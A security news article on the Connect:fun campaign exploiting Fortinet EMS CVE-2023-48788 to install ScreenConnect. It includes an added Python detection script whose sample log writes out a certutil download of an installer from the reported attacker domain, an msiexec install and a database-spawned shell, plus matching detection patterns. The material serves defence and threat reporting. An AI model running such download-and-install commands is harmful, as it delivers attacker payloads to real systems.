15 April 2024

Connect:fun campaign targets Fortinet bug to deploy malware and RMTs


Security researchers spotted an exploitation campaign that targets organizations by exploiting an SQL injection vulnerability in Fortinet's FortiClient Enterprise Management Server (EMS) software.

Tracked as CVE-2023-48788, the issue was brought to public attention on March 12, 2024. Subsequently, on March 21, researchers released a proof of concept (PoC) exploit for this vulnerability. Since then, reports have surfaced of active exploits in the wild, prompting the US Cybersecurity and Infrastructure Security Agency (CISA) to include CVE-2023-48788 in its list of Known Exploited Vulnerabilities (KEV) on March 25.

Dubbed "Connect:fun" by Forescout Research’s Vedere Labs, the campaign has been attributed to a threat actor believed to be in operation since at least 2022. Evidence suggests that the threat actor targets Fortinet appliances and employs a combination of Vietnamese and German languages within their infrastructure.

“Initially perceived as a security team or research team in Vietnam based on the GitHub repository, they are actively exploiting and installing tools post-exploitation on real targets instead of only researching,” the threat analysis team said.

The observed attack targeted an unnamed media company in March 2024, the researchers said.

On March 21, server logs revealed the threat actor's attempts to exploit CVE-2023-48788, aiming for command execution by manipulating SQL Server configurations.

Exploiting the SQL injection flaw, the actor successfully deployed the ScreenConnect remote management tool and a customized script based on Powerfun, an open-source utility with versatile capabilities, including bind and reverse shells, as well as arbitrary command execution.

The attackers then used certutil.exe to download ScreenConnect from the domain ursketz[.]com, followed by installation via msiexec.exe. The researchers said they weren’t able to retrieve the ScreenConnect logs to identify the actor’s further actions.
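The chain described above (a shell spawned under the database server, certutil.exe fetching an installer from ursketz[.]com, then msiexec.exe installing it) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article or from Forescout: it parses a constructed, simplified pipe-delimited process log and flags each stage of that chain. The log format, the sample records, the 30-minute correlation window and the assumption that the EMS database runs as sqlservr.exe are all assumptions made for this example; the domain is the one reported in the article, kept in its defanged form.

```python
"""
Added example (not from the original article): flag the download-then-install
chain the article describes in process-creation logs. Log format, field names
and all sample records below are constructed for this example.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample records: timestamp | host | parent_image | image | command_line
# Host ems01 mimics the chain from the article; host ws07 is benign noise.
SAMPLE_LOG = """\
2024-03-21T10:02:11Z|ems01|sqlservr.exe|cmd.exe|cmd.exe /c whoami
2024-03-21T10:03:05Z|ems01|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f http://ursketz[.]com/sc.msi C:\\Windows\\Temp\\sc.msi
2024-03-21T10:03:40Z|ems01|cmd.exe|msiexec.exe|msiexec.exe /i C:\\Windows\\Temp\\sc.msi /quiet
2024-03-21T11:15:00Z|ws07|explorer.exe|certutil.exe|certutil.exe -hashfile C:\\Users\\a\\setup.exe SHA256
2024-03-21T11:16:00Z|ws07|explorer.exe|msiexec.exe|msiexec.exe /i C:\\Users\\a\\Downloads\\7zip.msi
"""

# IoC taken from the article; the defanged form is kept so no live URL appears here.
KNOWN_BAD_DOMAINS = {"ursketz[.]com"}

# Assumption: the EMS database engine runs as sqlservr.exe; a shell under it is suspicious.
DB_PROCESSES = {"sqlservr.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

URL_HOST_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
# certutil's download idiom: -urlcache ... -f <url> <destination>
CERTUTIL_DL_RE = re.compile(r"-urlcache\b.*?(https?://\S+)\s+(\S+)", re.IGNORECASE)
# msiexec package install: /i <package>
MSIEXEC_INSTALL_RE = re.compile(r"/i\s+(\S+)", re.IGNORECASE)


def parse_log(text: str) -> List[Dict]:
    """Parse the constructed pipe-delimited format into records with parsed timestamps."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmd = line.split("|", 4)
        records.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "host": host,
            "parent": parent.lower(),
            "image": image.lower(),
            "cmd": cmd,
        })
    return records


def analyze(records: List[Dict], window: timedelta = timedelta(minutes=30)) -> List[Dict]:
    """Return one finding per matched rule; records must be in chronological order."""
    findings = []
    downloads = {}  # (host, destination path) -> certutil record that wrote it
    for r in records:
        # Stage 1: command execution reached through the database server process.
        if r["parent"] in DB_PROCESSES and r["image"] in SHELLS:
            findings.append({"rule": "sql_server_spawned_shell", "host": r["host"], "detail": r["cmd"]})

        # Stage 2: certutil used as a downloader (its -urlcache idiom), plus IoC match.
        if r["image"] == "certutil.exe":
            m = CERTUTIL_DL_RE.search(r["cmd"])
            if m:
                url, dest = m.group(1), m.group(2)
                findings.append({"rule": "certutil_download", "host": r["host"], "detail": url})
                downloads[(r["host"], dest.lower())] = r
                host_m = URL_HOST_RE.match(url)
                if host_m and host_m.group(1).lower() in KNOWN_BAD_DOMAINS:
                    findings.append({"rule": "known_bad_domain", "host": r["host"], "detail": host_m.group(1)})

        # Stage 3: msiexec installing a package certutil fetched shortly before on the same host.
        if r["image"] == "msiexec.exe":
            m = MSIEXEC_INSTALL_RE.search(r["cmd"])
            if m:
                dl = downloads.get((r["host"], m.group(1).lower()))
                if dl is not None and r["ts"] - dl["ts"] <= window:
                    findings.append({"rule": "certutil_then_msiexec", "host": r["host"],
                                     "detail": f"{dl['cmd']} -> {r['cmd']}"})
    return findings


if __name__ == "__main__":
    for f in analyze(parse_log(SAMPLE_LOG)):
        print(f"[{f['rule']}] {f['host']}: {f['detail']}")
```

The correlation keys on the destination path certutil wrote and the package path msiexec installed, so a legitimate certutil hash check or an unrelated MSI install on another host produces no finding; only the EMS host trips all three stages.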

“This is evidence the activity is part of a specific campaign rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances,” Forescout noted.
